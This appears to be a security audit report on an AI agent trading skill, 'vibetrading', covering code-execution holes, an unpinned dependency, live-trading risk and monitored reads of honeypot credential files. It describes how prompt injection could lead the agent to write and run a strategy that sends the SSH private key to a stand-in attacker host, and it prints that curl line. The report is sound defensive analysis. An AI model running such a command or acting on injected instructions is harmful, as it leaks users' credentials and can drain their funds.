Is crabbytt/vibetrading safe?

Both backtest_engine/historical_backtest.py and backtest_engine/strategy_adapter.py call importlib.util.spec_from_file_location() followed by spec.loader.exec_module() on a caller-supplied file path. Any Python file the agent is directed to load as a 'strategy' will execute with the agent's full process privileges. This is a native arbitrary code execution primitive when combined with the skill's code generation workflow.

The workflow of (1) generate Python strategy via natural language prompt, (2) save to disk, (3) run via backtest_runner.py or historical_backtest.py creates a fully agent-mediated code execution chain. An attacker who can influence the agent's prompt (e.g., via prompt injection in a user request, or malicious vibetrading signal data) could cause the agent to generate a strategy containing 'import subprocess; subprocess.run(["curl","-d",open("/root/.ssh/id_rsa").read(),"https://attacker.com"])' and then immediately execute it through the backtest interface.

All six canonical credential locations (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .gcloud/application_default_credentials.json) were opened and read in rapid succession at 11:02:13. The timing (26ms after monitoring started, 5 seconds before the git clone) and the uniform burst pattern are consistent with the oathe monitoring system performing a canary baseline read. However, process-level attribution was not captured, and the canary integrity check only validates non-modification — a read-then-exfiltrate pattern would pass this check. Canary integrity is confirmed clean.

The code validation system described in SKILL.md runs generated strategies through Python for syntax and import validation, with up to 5 re-execution cycles under --fix mode. Running LLM-generated code through a Python interpreter for 'validation' provides no security isolation — a crafted prompt could produce code that passes syntax checks while executing malicious logic during the import phase (e.g., module-level code or init side effects).

SKILL.md documents integration with 'from vibetrading import get_latest_signals'. This package is not bundled in the repository, has no pinned version, and is not present in any requirements.txt in the skill. An attacker who can publish or compromise the 'vibetrading' PyPI package could inject malicious code that executes when the agent installs and uses this skill, or could return manipulated signal data that influences trading behavior.

The skill is designed to generate and run code that places actual orders on Hyperliquid exchange using user-provided API keys stored in environment variables. A logic error, race condition, or adversarially crafted strategy could drain funds, create runaway buy/sell loops, or manipulate positions. The SKILL.md explicitly encourages running strategies for 'live trading' after only a brief paper-trading phase.

scripts/prompt_parser.py processes raw user natural language to extract trading parameters that are interpolated into generated Python code. Adversarial prompts containing Python metacharacters or conditional logic strings could escape the parameter extraction context and inject code into the generated strategy file.

Two persistent HTTPS connections to 185.125.188.57:443 and 185.125.190.18:443 (Canonical snap/update servers) existed before the skill install and were absent in the post-install network diff. This is consistent with normal Ubuntu background services disconnecting during the monitoring window and is not attributable to the skill.

All honeypot credential files were read during the monitoring period (two burst-read events: one at monitoring start, one post-install). The official canary integrity check confirms no file was modified, and no corresponding outbound data transfer of credential content was observed in network capture. The read access is assessed as monitoring-system-originated based on timing correlation.